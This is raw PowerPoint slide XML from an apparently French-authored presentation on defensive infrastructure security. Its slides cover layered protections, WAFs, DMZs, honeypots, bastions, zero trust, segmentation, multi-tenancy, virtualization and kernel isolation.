          <p:cNvPr id="22530" name="Picture 2" descr="Unveiling Application Servers: Exploring Definition, Use Cases, Advantages,  and Types | FS Community">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3D7901D-BF4B-550A-C334-DB8AE48CD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8" y="2205033"/>
            <a:ext cx="76200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0945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6E7C-D8D4-103B-11C3-CFAC45D6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675"/>
            <a:ext cx="10515600" cy="1268611"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Adding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Protections </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Layers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> L1,L2,..L8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2" descr="Unveiling Application Servers: Exploring Definition, Use Cases, Advantages,  and Types | FS Community">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E07B48B-41C1-8485-B28D-7DDF8E6FA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2" y="1643063"/>
            <a:ext cx="76200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8C7D4A2-E292-ED31-791F-4F9DB922BCD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19244608">
            <a:off x="1722698" y="4335552"/>
            <a:ext cx="1265007" cy="3524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E2C2F12-2D45-F5CD-3FCB-68A88D94D488}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="14484373">
            <a:off x="4421038" y="4367214"/>
            <a:ext cx="1265007" cy="3524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D2C91D-EF4E-2BFA-4808-C17F5F2F29DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5871211" y="4402899"/>
            <a:ext cx="1111066" cy="3524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72F0A3D-4BA5-1765-E976-F515C02911C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="3818279" y="4367213"/>
            <a:ext cx="1111066" cy="3524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DC53C-B0A3-D32A-67EF-4FBE57C3172C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="769435" y="5112355"/>
            <a:ext cx="268599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L1, L2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>LoadBalancer</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
              <a:t>Intrusion </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Prevention|Detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
              <a:t>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F4299-4307-6FD0-0D02-6E26E4B4F68B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4962194" y="5183122"/>
            <a:ext cx="11645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L3 WAF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
              <a:t>Web App</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
              <a:t>Firewall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4AFEF-B7FA-5156-4CEA-3EEE40D9ACDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6155319" y="5183122"/>
            <a:ext cx="1694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L5 Application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
              <a:t>Firewall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818E9F-3071-5FE4-D18C-380AE31FF056}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3386319" y="5183122"/>
            <a:ext cx="1622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L3 (Http)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Ingress</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>LoadBalancer</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" b="1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C84A3D5-10E0-F246-168B-4C69554F9DC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="14129008">
            <a:off x="6906795" y="4335551"/>
            <a:ext cx="1111066" cy="3524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54EF06-4489-C71A-DCA5-1DD47B5C7123}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7774569" y="5183122"/>
            <a:ext cx="16841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L6 API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
              <a:t>(ex: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Istio</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>ServiceMesh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1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0247657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1F364-7558-E1EC-6BAF-A6696F05A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1175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>DMZ = De-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Militarized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Zone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39926-4C36-D154-870B-BB0CBE86B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934" y="991175"/>
            <a:ext cx="8485605" cy="2914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98AFBD-4758-1ABB-EB71-4F4842CA7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095" y="3906078"/>
            <a:ext cx="3067316" cy="2884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7CCB73-0735-4AAF-54D0-521883EF9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931" y="3934655"/>
            <a:ext cx="3029213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26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8BDDD-53AE-523B-20EF-DA41EB1D3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7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HoneyPot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E3DB1-9868-8A2D-7574-F8013D81A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37034"/>
            <a:ext cx="3009416" cy="2924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4AFA2-FE9B-F721-83A5-CC6A44349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455" y="1114308"/>
            <a:ext cx="9697290" cy="2705334"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41986" name="Picture 2" descr="Pooh Face Sitting With Honey Pot - Winnie The Pooh Clipart Eating Honey  Transparent PNG - 486x765 - Free Download on NicePNG">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B583AA50-297E-25DE-A380-172E5E51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905896"/>
            <a:ext cx="1719262" cy="270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658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AFD3-F620-B8D6-B3B7-77FC1427C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Defense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Depth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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90F27-57C2-250A-3BD9-29779F775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215" y="1430566"/>
            <a:ext cx="8481795" cy="2053768"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43010" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15377BB9-2870-A059-4679-2FB14033D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722" y="3917948"/>
            <a:ext cx="4780903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3295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E3EE-F921-43A5-6352-519CF554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95376"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Bastion,  SSH Bastion, VPN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09C9F-BEE5-7ACD-69B1-590647DA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918" y="1145315"/>
            <a:ext cx="9704911" cy="3067316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44034" name="Picture 2" descr="Teleport 4.4 Announcement, ssh and Teleport">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FCA938C-A911-C5DA-E8FA-FB12FF95B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367" y="4110171"/>
            <a:ext cx="4529429" cy="254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855AB-945E-E20E-43A4-DC0571717428}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4906059" y="4710113"/>
            <a:ext cx="334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example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>: https://goteleport.com/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44036" name="Picture 4" descr="Bastion of Santa Bárbara">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01FAC0B8-35B4-1713-71CD-40862CE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4" y="4383947"/>
            <a:ext cx="3766299" cy="193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B98AA1-5BF5-0161-505C-168D5F212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592" y="5235260"/>
            <a:ext cx="1333616" cy="4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589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52D39-43F3-BE21-1E37-6F0CEE48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39975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Zero</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>-Trust Architecture (ZTA)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Perimeterless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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Insider</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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Unsafe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FD6EE-E937-3159-6216-355EB736A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73" y="3524143"/>
            <a:ext cx="9582980" cy="24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692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7E94-EFB9-F185-FBF3-573451E9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Network Segmentation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8C7F0-94CE-0E87-1D2B-643E2E49B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89" y="1988671"/>
            <a:ext cx="8436071" cy="343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098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6234D-53B4-5A43-943B-D392B5C3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of Network Architecture: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>"Hub - and - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Spoke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34818" name="Picture 2" descr="Hub And Spoke Logistics: Improved Distribution | Brimich">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBE61F63-90AC-C912-E007-220AEDE32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2127001"/>
            <a:ext cx="9167813" cy="417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919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7F9C-AD61-D147-1DC7-84036C50F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Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Vulnerabilities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6CAC-6374-2F05-2176-CC323FED1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679" y="2943225"/>
            <a:ext cx="6196321" cy="3814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CCEA1E-20B2-AAFC-1B4D-EC53B9A3F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6" y="1223775"/>
            <a:ext cx="5874384" cy="477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33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CC28-882F-4E48-8D52-6348D47E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724024"/>
            <a:ext cx="11225212" cy="3133725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Need for Isolations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>inside</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> CPU / Kernel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13397514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DD0E5-D6AF-6ACB-386E-29D95F6B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25625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Multi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> - Multi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Processes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> / Threads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need</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> "Isolation" Security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CFA2F3F-1AB1-1DE8-36A4-4CDF33A14BEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2905430" y="3099871"/>
            <a:ext cx="1041779" cy="4492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E731B-AEF7-B427-2403-DF1EFB51EE8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1536779" y="2618229"/>
            <a:ext cx="285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Input1  for User1 (Process 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13BE7B-4072-C1B4-8AC8-C7E520EAA217}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4719229" y="3740892"/>
            <a:ext cx="2877549" cy="16695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49C3EFB-290E-2B69-24EC-06B295734594}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8386548" y="3087300"/>
            <a:ext cx="1041779" cy="4492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DE7C2C-AB2D-E0A8-D546-523282533C04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8355200" y="2614178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Output 1  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="Circuit board">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3592E0A5-19DF-0816-DB8B-DFCFCEFA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46" y="4056885"/>
            <a:ext cx="1554486" cy="10375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1858BFA-4B8F-A2A9-956A-E5DECDA3F077}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6446408" y="4110224"/>
            <a:ext cx="643968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1003AC-2520-7888-773F-92F99EFA0ED2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6524701" y="4285871"/>
            <a:ext cx="643968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855135-E724-05E1-A269-82E19765B7EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6677101" y="4438271"/>
            <a:ext cx="643968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8148A6-4960-15A3-6772-8A1231CF9742}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6829501" y="4590671"/>
            <a:ext cx="643968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5AEA7ED-9724-20DA-E0BF-7DF97AE21C50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2886397" y="4600059"/>
            <a:ext cx="1041779" cy="4492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FE95F-1C55-E67F-E821-946BCBAB89B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1517746" y="4118417"/>
            <a:ext cx="2833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Input2  for User2 (Process 2)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FB09AAD-8F5A-E69C-141B-2999C36F11D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8387831" y="4575680"/>
            <a:ext cx="1041779" cy="4492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A1C957-7FF1-843D-F337-BAA0454879C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8356483" y="4102558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Output 2  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4AB5FDC-766E-FDBE-1492-D5D496B31ED7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2886396" y="5875267"/>
            <a:ext cx="1041779" cy="4492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E81E483-0B95-02BE-3BD6-86EBE1B596C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8393846" y="5875267"/>
            <a:ext cx="1041779" cy="4492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BA2880-8073-16CC-F9DA-E4813685BC9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1554412" y="5583903"/>
            <a:ext cx="290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Input 3  for User3 (Process 3)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1DC07C-4452-F589-13A8-D56BE5C88643}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1517746" y="5666666"/>
            <a:ext cx="8526367" cy="72937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2CFC66-454B-F481-AC07-E502804FA235}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8375164" y="5619066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Output 3  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42334273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C075-A3CB-1E5C-D036-4A3F8205C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Sharing (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>memory,cpu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Processes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> on  1 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5EAF3-FB00-A77B-4550-CC76B0D51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37" y="3500400"/>
            <a:ext cx="857324" cy="857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408A5D-CDF2-D535-1D2A-7DA103DC1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009" y="1947706"/>
            <a:ext cx="7914056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649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8EA82-7F20-1FD0-74D2-6C8C20EE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Single-Tenant   vs   Multi-Tenant ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19458" name="Picture 2" descr="Qu'est-ce qu'une architecture multi-tenant? | Architecture et urbanisation  des systèmes d'information">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C3411B3-4E21-70AA-9D6E-79DDB5DBA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466975"/>
            <a:ext cx="84201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546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E9B5-7202-6AE3-8269-D4406912B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071563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Virtual Machine - Containers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21508" name="Picture 4" descr="Containers vs. Virtual Machines (VMs): What's the Difference? | NetApp Blog">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B62879C-7812-8CED-F055-8F5FEE4D7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4" y="1493766"/>
            <a:ext cx="9348787" cy="499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386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4E22-3DE4-FCC7-7943-0B1C91AF1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VM Monitor, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Virtualizer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Hypervisor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75DE4-0381-936B-3E3C-604FA24EF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3563340"/>
            <a:ext cx="8757744" cy="3242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27D6D-99E1-8096-13B5-366EE3B42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496" y="1081139"/>
            <a:ext cx="9410202" cy="204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073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07B66-380B-45E0-E853-D16C982A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Virtualized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> - Hyper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Converged</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20484" name="Picture 4" descr="What Is Hyper-Converged Infrastructure (HCI) And Its Pros &amp; Cons : @VMblog">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{142BA0DD-78E6-65D6-68EA-0293C9B35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890713"/>
            <a:ext cx="97917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3893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685C-51D0-65D7-3C96-3A81744A6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113"/>
            <a:ext cx="10515600" cy="1371600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Physical Architecture of Computer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EEE87F0-F4C9-4E6B-2040-CF6777FF0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1676279"/>
            <a:ext cx="4605337" cy="477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3425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73E61-7C4C-0598-2CE7-CC8C9CC3C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" y="0"/>
            <a:ext cx="5695950" cy="1349375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://en.wikipedia.org/wiki/Linux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491F9-A35C-596C-4A12-DCF137398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117" y="281033"/>
            <a:ext cx="4680757" cy="6500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0DC118-2115-A6F3-A4A6-7AB04946C26A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1843088" y="5834063"/>
            <a:ext cx="2068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Hardware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2E9E7-3271-CF1D-F683-0BB40FB811B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1262063" y="4586288"/>
            <a:ext cx="336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Bios, Bootloader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A935B5-CAD6-B853-549B-EE03D103E0A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2251276" y="3429000"/>
            <a:ext cx="138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Kernel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72DEBE-7AD6-D778-38B8-8D13A2D1B3E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557950" y="1717714"/>
            <a:ext cx="31731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User Mode:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" dirty="0"/>
              <a:t>   Apps, Services</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3125266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9549-1135-65BA-59A2-4398FB1C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5" y="2244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"Physical" Levels of Security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 2, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 3 ..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9E12B-6A8F-310E-889D-930526D046E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6024563" y="5807037"/>
